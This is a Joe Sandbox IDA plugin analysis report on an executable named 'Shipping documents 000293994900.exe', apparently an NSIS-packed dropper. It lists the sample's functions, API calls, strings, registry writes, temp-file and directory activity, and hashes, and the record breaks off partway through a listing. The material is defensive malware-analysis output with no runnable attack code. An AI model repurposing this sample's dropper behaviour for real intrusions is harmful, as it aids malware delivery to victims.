Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: 4Te
API String ID: 3282139019-1059887577
Opcode ID: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
Opcode Fuzzy Hash: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

Function 004038B2 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,75923420,00000000,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 00403933
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\Uploadable\normallnnens,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B3
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\Uploadable\normallnnens,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
GetFileAttributesW.KERNEL32(Call), ref: 004039D1
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\Uploadable\normallnnens), ref: 00403A1A

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

RegisterClassW.USER32(00428180), ref: 00403A57
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
ShowWindow.USER32(00000005,00000000), ref: 00403ADA
LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AEB
LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
RegisterClassW.USER32(00428180), ref: 00403B1C
DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B

Strings

RichEdit20W, xrefs: 00403AFE, 00403B04
C:\Users\user\AppData\Local\Temp\, xrefs: 004038BE
RichEdit, xrefs: 00403B0D
RichEd32, xrefs: 00403AF1
.DEFAULT\Control Panel\International, xrefs: 0040391E
C:\Users\user\Uploadable\normallnnens, xrefs: 00403942, 0040394A, 004039ED, 004039F3, 00403A03
Control Panel\Desktop\ResourceLocale, xrefs: 004038E6
"C:\Users\user\Desktop\Shipping documents 000293994900.exe", xrefs: 004038B5
1033, xrefs: 004038D2, 0040392E
_Nb, xrefs: 00403A36, 00403A9E
Call, xrefs: 0040397A, 00403983, 00403991, 004039E0, 004039E6
.exe, xrefs: 004039C0
RichEd20, xrefs: 00403AE6

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Shipping documents 000293994900.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Uploadable\normallnnens$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 914957316-2395347289
Opcode ID: 026d5a3465d614f87136ed0c1228ce7353d28a0e64fd29dc9081dcfbce6d88a6
Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
Opcode Fuzzy Hash: 026d5a3465d614f87136ed0c1228ce7353d28a0e64fd29dc9081dcfbce6d88a6
Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

Function 00402DBA Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DCE
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Shipping documents 000293994900.exe,00000400), ref: 00402DEA

Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\Shipping documents 000293994900.exe,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping documents 000293994900.exe,C:\Users\user\Desktop\Shipping documents 000293994900.exe,80000000,00000003), ref: 00402E33
GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A

Strings

C:\Users\user\Desktop\Shipping documents 000293994900.exe, xrefs: 00402DD4, 00402DE3, 00402DF7, 00402E14
C:\Users\user\Desktop, xrefs: 00402E15, 00402E1A, 00402E20
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC7, 00402F92
Inst, xrefs: 00402EA1
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
Error launching installer, xrefs: 00402E0A
soft, xrefs: 00402EAA
"C:\Users\user\Desktop\Shipping documents 000293994900.exe", xrefs: 00402DC3
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
Null, xrefs: 00402EB3

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Shipping documents 000293994900.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Shipping documents 000293994900.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3190598174
Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C

Function 10001B3E Relevance: 20.0, APIs: 13, Instructions: 542stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225

Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C4A
lstrcpyW.KERNEL32(00000008,?), ref: 10001C92
lstrcpyW.KERNEL32(00000808,?), ref: 10001C9C
GlobalFree.KERNEL32(00000000), ref: 10001CAF
GlobalFree.KERNEL32(?), ref: 10001DA9
GlobalFree.KERNEL32(?), ref: 10001DAE
GlobalFree.KERNEL32(?), ref: 10001DB3
GlobalFree.KERNEL32(00000000), ref: 10001F57
lstrcpyW.KERNEL32(?,?), ref: 100020BB

Memory Dump Source

Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
Instruction ID: 71c1a880e39e69f42b548688fcbdb76c41956fc1357523659d9e12ead3b80716
Opcode Fuzzy Hash: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
Instruction Fuzzy Hash: F9127A75D0064ADBEB20CFA4C8846EEB7F4FF083D5F21452AE5A5E3288D7749A81DB50

Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\Uploadable\normallnnens,?,?,00000031), ref: 00401793
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\Uploadable\normallnnens,?,?,00000031), ref: 004017B8

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Strings

C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll, xrefs: 00401818, 00401834
C:\Users\user\AppData\Local\Temp\nsvB4E.tmp, xrefs: 00401804, 00401822
C:\Users\user\Uploadable\normallnnens, xrefs: 00401781
Call, xrefs: 00401770, 00401779, 00401786, 00401798, 004017A4, 004017DA, 004017F0, 0040180E, 0040184A, 004018CB, 004018D4, 004018DE, 004018E9

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp$C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll$C:\Users\user\Uploadable\normallnnens$Call
API String ID: 1941528284-855634427
Opcode ID: c934a5f4023ad52aa090981e8ce84fa05bfe414c99e0bb626fd2f32e4f320a2f
Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
Opcode Fuzzy Hash: c934a5f4023ad52aa090981e8ce84fa05bfe414c99e0bb626fd2f32e4f320a2f
Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E

Function 00405192 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll), ref: 004051FF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll, xrefs: 004051B3, 004051C3, 004051C9, 004051EC, 004051F8

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll
API String ID: 2531174081-4273610947
Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

Function 0040317B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403190

Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
WriteFile.KERNELBASE(0040BE78,0040DB10,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
SetFilePointer.KERNELBASE(00006EB9,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF

Strings

x>A, xrefs: 004031F0

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: x>A
API String ID: 2146148272-3854404225
Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

Function 0040232F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvB4E.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Strings

C:\Users\user\AppData\Local\Temp\nsvB4E.tmp, xrefs: 0040237E, 004023A3, 004023B3, 004023BE

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp
API String ID: 1356686001-1339453875
Opcode ID: ccfe9803d7e227ab7e2a72a0b4861a967dbf62cf09f9511f26540d48752b467a
Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
Opcode Fuzzy Hash: ccfe9803d7e227ab7e2a72a0b4861a967dbf62cf09f9511f26540d48752b467a
Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69

Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 004059EC
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09

CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\Uploadable\normallnnens,?,00000000,000000F0), ref: 00401630

Strings

C:\Users\user\Uploadable\normallnnens, xrefs: 00401623

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\Uploadable\normallnnens
API String ID: 3751793516-2478767733
Opcode ID: 3d83efa2bc4fe2806ed3000ea967517c516f08bd89cd182248c21611bd136b71
Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
Opcode Fuzzy Hash: 3d83efa2bc4fe2806ed3000ea967517c516f08bd89cd182248c21611bd136b71
Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

Function 10001771 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3

GlobalFree.KERNEL32(00000000), ref: 1000181C
FreeLibrary.KERNEL32(?), ref: 10001893
GlobalFree.KERNEL32(00000000), ref: 100018B8

Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,004050A3), ref: 100022D3

Part of subcall function 10002614: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 10002686

Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5

Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002562
Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 1000258B

Strings

, xrefs: 10001899

Memory Dump Source

Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpywsprintf
String ID:
API String ID: 1767494692-3916222277
Opcode ID: 1685173ce3d2b65da630a914681d80644a307c638f4ca4f93a48449925dcaf4b
Instruction ID: f1aa1b9103b0a65f35aec93e8e69466a872eebdec6ee13635525f9d4203f99a4
Opcode Fuzzy Hash: 1685173ce3d2b65da630a914681d80644a307c638f4ca4f93a48449925dcaf4b
Instruction Fuzzy Hash: 9931BF799042459AFB10DF74DCC5BDA37E8EB043D4F058529FA0AAA08EDF74A985C760

Function 00403060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113

Strings

x>A, xrefs: 004030DC

Memory Dump Source

Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
